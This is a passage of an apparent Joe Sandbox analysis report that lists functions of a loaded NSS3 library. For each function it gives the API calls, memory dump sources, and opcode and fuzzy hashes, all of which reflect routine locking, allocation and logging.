                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C498EF1
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C498F20
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                                                      • String ID: b.Kl
                                                                                                                                                                                                                                                      • API String ID: 1978757487-3576770755
                                                                                                                                                                                                                                                      • Opcode ID: a9797862e37690af4c78d1e26641df66f6bab48f7f7e3264f8645b3d4f92276f
                                                                                                                                                                                                                                                      • Instruction ID: e3f2aaff8ccfca70267d5360b46e06c0756171a1020682c9ea4b6125ec88f1f2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9797862e37690af4c78d1e26641df66f6bab48f7f7e3264f8645b3d4f92276f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33216874A096159FDB00EF29D488A99BBF0FF48318F41456EE8989BB41E730E854CBD6
                                                                                                                                                                                                                                                      Function 6C503E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503E45
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503E5C
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503E73
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C503EA6
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503EC0
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503ED7
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503EEE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2517541793-0
                                                                                                                                                                                                                                                      • Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                                                      • Instruction ID: 0bac83c17641aff78a8d87d6a351fd53d568f568cab8474899296f46f0fc51e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 511175B1610610EFDB319E29FC02FC7B7A1AB81318F401934E65EC6A20F636E929C742
                                                                                                                                                                                                                                                      Function 6C582C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C582CA0
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C582CBE
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000014), ref: 6C582CD1
                                                                                                                                                                                                                                                      • strdup.MOZGLUE(?), ref: 6C582CE1
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C582D27
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • Loaded library %s (static lib), xrefs: 6C582D22
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                      • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                      • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                      • Opcode ID: 461ea2ae8e86fadf9e162bbd41ad3737541e7776d45dd3381a69d2bf0cb5334f
                                                                                                                                                                                                                                                      • Instruction ID: 0a84a587b5851ab96c2f52c43d97d4292994dcbc4a6e914fc18904ded6b7fd14
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 461ea2ae8e86fadf9e162bbd41ad3737541e7776d45dd3381a69d2bf0cb5334f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C1190B1602320ABEB10CF15DC48A667BB4EB85319F15853DE809C7F41E731E809CBA9
                                                                                                                                                                                                                                                      Function 6C47BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47BDCA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDDB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C47BE03
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE22
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE30
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47BE3B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1821307800-0
                                                                                                                                                                                                                                                      • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                      • Instruction ID: 5f964d81c9b8c11257a606a83ec57296a1e7582d1490ac854d5d33d2b95f33aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01014EA5B4120177F620B2667C01FDB2A484F5039DF140034FE0496F82FB55F51982F6
                                                                                                                                                                                                                                                      Function 6C4D0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1044
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,00000800,6C46EF74,00000000), ref: 6C4D1064
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3379159031-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 02acba3b3836e3072f187da29241c84086c64a4e368e9009c5ff175770932a2a
                                                                                                                                                                                                                                                      • Instruction ID: 74857893dbfc25011145f99ef425064ebdb4660f07c2eda5b632f5e796c99fae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02acba3b3836e3072f187da29241c84086c64a4e368e9009c5ff175770932a2a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1014870A4025097E722BF2D8C08F467A78FF43769F030119EC0896E51EB60F105DBD5
                                                                                                                                                                                                                                                      Function 6C501C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C501C74
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C501C92
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C501C99
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C501CCB
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C501CD2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3805613680-0
                                                                                                                                                                                                                                                      • Opcode ID: e12b4c4d7c8c5026a1d9c572679307f77e50c7cd1d3878ec3e7b9582dbaa7269
                                                                                                                                                                                                                                                      • Instruction ID: f3716130216a1e28f4058b5ac69fe08e53a65014b458d16a0b55e2fa74166e9b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e12b4c4d7c8c5026a1d9c572679307f77e50c7cd1d3878ec3e7b9582dbaa7269
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4601C4B1F057129BEA10EFA49C0E74A77B4A71630CF420825E50AE6F40E765F944879F
                                                                                                                                                                                                                                                      Function 6C512E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C513046
                                                                                                                                                                                                                                                        • Part of subcall function 6C4FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
                                                                                                                                                                                                                                                      • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C4E7FFB), ref: 6C51312A
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C513154
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C512E8B
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C4E9BFF,?,00000000,00000000), ref: 6C4FF134
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(8B3C75C0,?,6C4E7FFA), ref: 6C512EA4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C51317B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2334702667-0
                                                                                                                                                                                                                                                      • Opcode ID: d1b755c599a2000ef2dcd903d391b4e963ee6d873b1f720c8ba0e42a46adff1d
                                                                                                                                                                                                                                                      • Instruction ID: 91b54a429861581a86dc08948bef0b1e1e0f7f341b10f581897410e47bb54534
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1b755c599a2000ef2dcd903d391b4e963ee6d873b1f720c8ba0e42a46adff1d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1A1CD71A042189FEB24CF54CC85FEAB7B5EF49308F048199E94967B41E731AD85CF91
                                                                                                                                                                                                                                                      Function 6C4DED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C4DED6B
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6C4DEDCE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,6C4DB04F), ref: 6C4DEE46
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DEECA
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C4DEEEA
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4DEEFB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3768380896-0
                                                                                                                                                                                                                                                      • Opcode ID: d0f05117d560ebc0d0808c02d4f1b4d350f85c3ea38f08e77777e9d2624dd252
                                                                                                                                                                                                                                                      • Instruction ID: 38a578178581b246e55e8bfe7458f91c19bc4e0a70a125b44e253f5859eaf33e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0f05117d560ebc0d0808c02d4f1b4d350f85c3ea38f08e77777e9d2624dd252
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B816C71A012069FEB10EF55C8A4F6AB7F5AF48309F15442CE8159B751DB31F805CBE1
                                                                                                                                                                                                                                                      Function 6C4DCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C4DCD35
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C4DCD54
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471CCC,00000000,00000000,?,?), ref: 6C4C729F
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DCD9B
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C4DCE0B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C4DCE2C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
